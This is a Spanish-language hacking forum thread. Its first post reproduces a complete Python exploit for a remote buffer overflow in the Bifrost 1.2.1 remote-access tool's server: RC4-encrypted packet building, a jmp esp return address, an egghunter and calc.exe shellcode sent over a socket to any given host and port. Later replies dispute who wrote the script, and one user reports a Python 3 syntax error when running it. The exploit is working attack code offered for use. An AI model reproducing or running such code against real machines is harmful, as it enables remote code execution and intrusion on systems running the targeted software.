send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Bifrost 1.2.1 - Remote Buffer OverFlow Vulnerability

  • 5 Respuestas
  • 2720 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Mayk0

  • *
  • Underc0der
  • Mensajes: 127
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Hacktivismo Latinoamerica
    • Email
  • Skype: maykozapata
« en: Julio 09, 2013, 06:12:13 pm »
============================
Date add:   2013-07-01
Category:   remote exploits
Verified:   Not verified yet Not verified yet
Platform:   Windows
============================


Código: Python
  1. #!/usr/bin/python2.7
  2. #By : Mohamed Clay
  3. import socket
  4. from time import sleep
  5. from itertools import izip, cycle
  6. import base64
  7. import sys
  8.  
  9. def rc4crypt(data, key):
  10.     x = 0
  11.     box = range(256)
  12.     for i in range(256):
  13.         x = (x + box[i] + ord(key[i % len(key)])) % 256
  14.         box[i], box[x] = box[x], box[i]
  15.     x = 0
  16.     y = 0
  17.     out = []
  18.     for char in data:
  19.         x = (x + 1) % 256
  20.         y = (y + box[x]) % 256
  21.         box[x], box[y] = box[y], box[x]
  22.         out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
  23.      
  24.     return ''.join(out)
  25.  
  26. def bif_len(s):
  27.     while len(s)<8:
  28.          s=s+"00"
  29.     return s
  30.  
  31. def header(s):
  32.       a=(s[0]+s[1]).decode("hex")
  33.       a+=(s[2]+s[3]).decode("hex")
  34.       a+=(s[4]+s[5]).decode("hex")
  35.       a+=(s[5]+s[6]).decode("hex")
  36.       return a
  37.  
  38. def random():    
  39.     a=""
  40.     for i in range(0,8):
  41.         a+="A"*1000+"|"
  42.     return a
  43.  
  44. def usage():
  45.  
  46.    print "\n\n\t***************************"
  47.    print "\t*    By : Mohamed Clay    *"
  48.    print "\t*  Bifrost 1.2.1 Exploit  *"
  49.    print "\t***************************\n"
  50.    print "\t  Usage : ./bifrost1.2.1 host port"
  51.    print "\tExample : ./bifrost1.2.1 192.168.1.10 81\n\n"
  52.  
  53.  
  54. if len(sys.argv)!=3:
  55.     usage()
  56.     exit()
  57.  
  58. HOST=sys.argv[1]
  59. PORT=int(sys.argv[2])
  60.  
  61. key="\xA3\x78\x26\x35\x57\x32\x2D\x60\xB4\x3C\x2A\x5E\x33\x34\x72\x00"
  62.  
  63. xor="\xB2\x9C\x51\xBB" # we need this in order to bypass 0046A03E function
  64. eip="\x53\x93\x3A\x7E" # jmp esp User32.dll
  65.  
  66. egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
  67.  
  68. #calc.exe shellcode (badchars "\x00")
  69.  
  70. buf ="\xb8\x75\xd3\x5c\x87\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9"
  71. buf +="\xb1\x33\x31\x43\x12\x83\xeb\xfc\x03\x36\xdd\xbe\x72\x44"
  72. buf +="\x09\xb7\x7d\xb4\xca\xa8\xf4\x51\xfb\xfa\x63\x12\xae\xca"
  73. buf +="\xe0\x76\x43\xa0\xa5\x62\xd0\xc4\x61\x85\x51\x62\x54\xa8"
  74. buf +="\x62\x42\x58\x66\xa0\xc4\x24\x74\xf5\x26\x14\xb7\x08\x26"
  75. buf +="\x51\xa5\xe3\x7a\x0a\xa2\x56\x6b\x3f\xf6\x6a\x8a\xef\x7d"
  76. buf +="\xd2\xf4\x8a\x41\xa7\x4e\x94\x91\x18\xc4\xde\x09\x12\x82"
  77. buf +="\xfe\x28\xf7\xd0\xc3\x63\x7c\x22\xb7\x72\x54\x7a\x38\x45"
  78. buf +="\x98\xd1\x07\x6a\x15\x2b\x4f\x4c\xc6\x5e\xbb\xaf\x7b\x59"
  79. buf +="\x78\xd2\xa7\xec\x9d\x74\x23\x56\x46\x85\xe0\x01\x0d\x89"
  80. buf +="\x4d\x45\x49\x8d\x50\x8a\xe1\xa9\xd9\x2d\x26\x38\x99\x09"
  81. buf +="\xe2\x61\x79\x33\xb3\xcf\x2c\x4c\xa3\xb7\x91\xe8\xaf\x55"
  82. buf +="\xc5\x8b\xed\x33\x18\x19\x88\x7a\x1a\x21\x93\x2c\x73\x10"
  83. buf +="\x18\xa3\x04\xad\xcb\x80\xfb\xe7\x56\xa0\x93\xa1\x02\xf1"
  84. buf +="\xf9\x51\xf9\x35\x04\xd2\x08\xc5\xf3\xca\x78\xc0\xb8\x4c"
  85. buf +="\x90\xb8\xd1\x38\x96\x6f\xd1\x68\xf5\xee\x41\xf0\xd4\x95"
  86. buf +="\xe1\x93\x28"
  87.  
  88.  
  89. raw=(1000-533-len(egghunter))*"\x90"
  90. raw2=(1000-8-len(buf))*"\x41"+"|"
  91. command=30
  92.  
  93. tmp=hex(command).split("0x")[1]
  94. data=tmp.decode("hex")+"F"*2+" "*511+xor+"C"*8+eip+"A"*12+egghunter+raw+"|"+" "*1000+"|"+"w00tw00t"+buf+raw2+random()
  95. out=rc4crypt(data,key)
  96. l=header(bif_len(str(hex(len(data))).split("0x")[1]))
  97. out=l+out
  98. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  99. s.connect((HOST, PORT))
  100. s.sendall(out)
  101. print "\n[*] By : Mohamed Clay"
  102. print "[*] Exploit completed\n"
« Última modificación: Julio 09, 2013, 09:47:37 pm por Kodeinfect »
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #1 en: Julio 09, 2013, 06:55:36 pm »
Lo armo el staff el script? oque :/ no comprendo  por que lleva by Underc0de
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado Kodeinfect

  • *
  • Underc0der
  • Mensajes: 327
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Kodeinfect's Blog
« Respuesta #2 en: Julio 09, 2013, 09:47:02 pm »
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Lo armo el staff el script? oque :/ no comprendo  por que lleva by Underc0de
Es el mismo exploit que está por todas las webs.
Del código original se lee claramente #By : Mohamed Clay".
No se por que hacen esto, editaré el post y pondré el exploit original.

Desconectado Mayk0

  • *
  • Underc0der
  • Mensajes: 127
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Hacktivismo Latinoamerica
    • Email
  • Skype: maykozapata
« Respuesta #3 en: Julio 10, 2013, 12:31:16 am »
Aver el post es de un exploit que tenia aca yo dando vueltas, Le puse "Underc0de" Pido disculpas si Ofendi a alguien -.-!"
« Última modificación: Julio 10, 2013, 12:43:27 am por Mayk0 »
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #4 en: Julio 11, 2013, 04:50:31 pm »
No es que hayas ofendido a alquien -_-! o no simplemente que las cosas como son!!!

Regards,
Snifer
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado Ricardini

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: system_security@live.com
« Respuesta #5 en: Agosto 22, 2013, 09:02:39 am »
este exploit ataca al troyano el cual hace el server osea al bifrost en si ? lo vulnera indicarme por favor

C:\Python33>bifrost.py
  File "C:\Python33\bifrost.py", line 3
    import socket
    ^
IndentationError: unexpected indent

me arroja ese error ????????????????????
« Última modificación: Agosto 22, 2013, 09:17:15 am por Ricardini »

 

¿Te gustó el post? COMPARTILO!



Joomla 0-Day - HTTP Headers Remote Code Execution - CVE-2015-8562

Iniciado por Franciscodc

Respuestas: 0
Vistas: 2531
Último mensaje Diciembre 26, 2015, 05:10:59 am
por Franciscodc
WordPress Wordfence Firewall 5.1.2 Cross Site Scripting Vulnerability

Iniciado por Mayk0

Respuestas: 0
Vistas: 1691
Último mensaje Noviembre 07, 2014, 01:55:54 pm
por Mayk0
CVE-2015-1701 : Windows 7 privilege escalation vulnerability

Iniciado por LionSec

Respuestas: 8
Vistas: 3879
Último mensaje Mayo 22, 2015, 08:02:27 pm
por rand0m
Zend hash del_key or index vulnerability! By MurdeR

Iniciado por ANTRAX

Respuestas: 0
Vistas: 1491
Último mensaje Abril 09, 2012, 09:13:44 am
por ANTRAX
Vuln Hunter 2014 - Website Vulnerability Scanner

Iniciado por ZanGetsu

Respuestas: 10
Vistas: 3582
Último mensaje Febrero 19, 2014, 12:27:07 pm
por GangsteR